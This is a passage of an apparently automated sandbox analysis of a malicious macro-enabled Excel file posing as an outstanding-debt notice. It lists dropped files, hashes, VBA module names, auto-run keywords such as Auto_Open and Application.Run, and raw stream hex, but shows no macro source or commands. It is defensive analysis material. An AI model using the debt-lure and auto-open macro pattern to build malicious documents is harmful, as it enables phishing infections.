                                                                                                                                                Reputation:low
                                                                                                                                                Preview: Desktop.LNK=0..[misc]..Outstanding-Debt-71778964-05042021.LNK=0..Outstanding-Debt-71778964-05042021.LNK=0..[misc]..Outstanding-Debt-71778964-05042021.LNK=0..
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22
                                                                                                                                                Entropy (8bit):2.9808259362290785
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                C:\Users\user\Desktop\5EC10000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119841
                                                                                                                                                Entropy (8bit):7.69828011949838
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hybemfqkvKINbjvw548LMb/oqKO8NnS8+60Kcrt:EFuAbT648LM7D98Np+EEt
                                                                                                                                                MD5:74FACCA6B9FC5ED46704A2F4DE91A6E9
                                                                                                                                                SHA1:2E4707C6E76423B65A5DDB7E5D287273E47AC024
                                                                                                                                                SHA-256:1BA03CDFA7EDD40F21F08E7E8FAB766CC3B181CB50E1AF1C81F3856923334CC0
                                                                                                                                                SHA-512:F1FF7AA9B23F4DC0B803F56580D28230908BE5837A2442011925D300B54D205DCA27778E79821492F57B689A8EF2AEC7F990A7DA9158213ED362D21738BF13FD
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.n.1.}...X..Z..RUU,yh..6R..0..k.M.C..;6..)..@...s..x..fet........#R..N*.6...}..T1q+.v....Hn&.?....b..66.K..c,.....y..2s.....e...o.].F_.p6.Mu..d2......[..M&SeI.}._.j..^+..&.V.#..l..H'..B...p.;.d4.A!cx..PX$l/g....nUQ.,..N.....`.+.U.....].2..s.m...;......,.[i...b......4....MK..".;..p.+.*..S....N...K.o`VR...q...(..Z....E..........<..NV.pz.+......./...x....1w<.|L8..'.'vO.2...>._.-.@....i..)..n.".~....q...vh.. ...m..w.....#...`g%.............nV.~........PK..........!.........*.......[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\Desktop\~$Outstanding-Debt-71778964-05042021.xlsm
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                Entropy (8bit):7.688569654505375
                                                                                                                                                TrID:
                                                                                                                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                File name:Outstanding-Debt-71778964-05042021.xlsm
                                                                                                                                                File size:116934
                                                                                                                                                MD5:19ad92f20025aa19a6947fa78fd142c1
                                                                                                                                                SHA1:70b88be09827de5d40a03bca4ac49e2a7de69ea9
                                                                                                                                                SHA256:f7bb7538509e6652197d8877aceac43f6370b763a323cb3990ab5991124b1941
                                                                                                                                                SHA512:457de0d2cd5e0a429ed091400f8fe06be5e874f48434422d8da97db4c9307faba7b9c27591ec8625081e4e2775850e98c76b4a2e29de9403f3b4e24d0aa1ccd6
                                                                                                                                                SSDEEP:3072:bkYvKINbjvw548LMb/oqKO8NnS8+60Kc+ECx:gAbT648LM7D98Np+EdECx
                                                                                                                                                File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd0e2f696908c

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OpenXML
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/404155/sample/Outstanding-Debt-71778964-05042021.xlsm"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:False
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Author:Rabota
                                                                                                                                                Last Saved By:Noped
                                                                                                                                                Create Time:2015-06-05T18:19:34Z
                                                                                                                                                Last Saved Time:2021-05-04T08:11:27Z
                                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                                Company:
                                                                                                                                                Contains Dirty Links:false
                                                                                                                                                Shared Document:false
                                                                                                                                                Changed Hyperlinks:false
                                                                                                                                                Application Version:16.0300

                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: Blasr.bas, Stream Size: 1166
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Blasr
                                                                                                                                                VBA File Name:Blasr.bas
                                                                                                                                                Stream Size:1166
                                                                                                                                                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                "Blasr"
                                                                                                                                                Application.Run
                                                                                                                                                Attribute
                                                                                                                                                Auto_Open()
                                                                                                                                                VB_Name
                                                                                                                                                Private
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Briks.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Briks
                                                                                                                                                VBA File Name:Briks.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Briks"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Byutut.bas, Stream Size: 1056
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Byutut
                                                                                                                                                VBA File Name:Byutut.bas
                                                                                                                                                Stream Size:1056
                                                                                                                                                Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                "Byutut"
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class1.cls, Stream Size: 1151
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class1
                                                                                                                                                VBA File Name:Class1.cls
                                                                                                                                                Stream Size:1151
                                                                                                                                                Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class2.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class2
                                                                                                                                                VBA File Name:Class2.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Class3.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class3
                                                                                                                                                VBA File Name:Class3.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Kikide.cls, Stream Size: 1249
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Kikide
                                                                                                                                                VBA File Name:Kikide.cls
                                                                                                                                                Stream Size:1249
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Kikide"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: UserForm1.frm, Stream Size: 1526
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/UserForm1
                                                                                                                                                VBA File Name:UserForm1.frm
                                                                                                                                                Stream Size:1526
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Vrest.bas, Stream Size: 679
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vrest
                                                                                                                                                VBA File Name:Vrest.bas
                                                                                                                                                Stream Size:679
                                                                                                                                                Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                "Vrest"
                                                                                                                                                VB_Name
                                                                                                                                                VBA Code
                                                                                                                                                VBA File Name: Vsewd.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vsewd
                                                                                                                                                VBA File Name:Vsewd.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                "Vsewd"
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code

                                                                                                                                                Streams

                                                                                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECT
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:856
                                                                                                                                                Entropy:5.31019504221
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4
                                                                                                                                                Data Raw:49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77
                                                                                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 209
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECTwm
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:209
                                                                                                                                                Entropy:3.32661660177
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                                                                                                                                                Data Raw:4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43
                                                                                                                                                Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x1CompObj
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:97
                                                                                                                                                Entropy:3.61064918306
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x3VBFrame
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:266
                                                                                                                                                Entropy:4.62034133633
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                                                Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                                                Stream Path: UserForm1/f, File Type: data, Stream Size: 38
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/f
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:38
                                                                                                                                                Entropy:1.54052096453
                                                                                                                                                Base64 Encoded:False
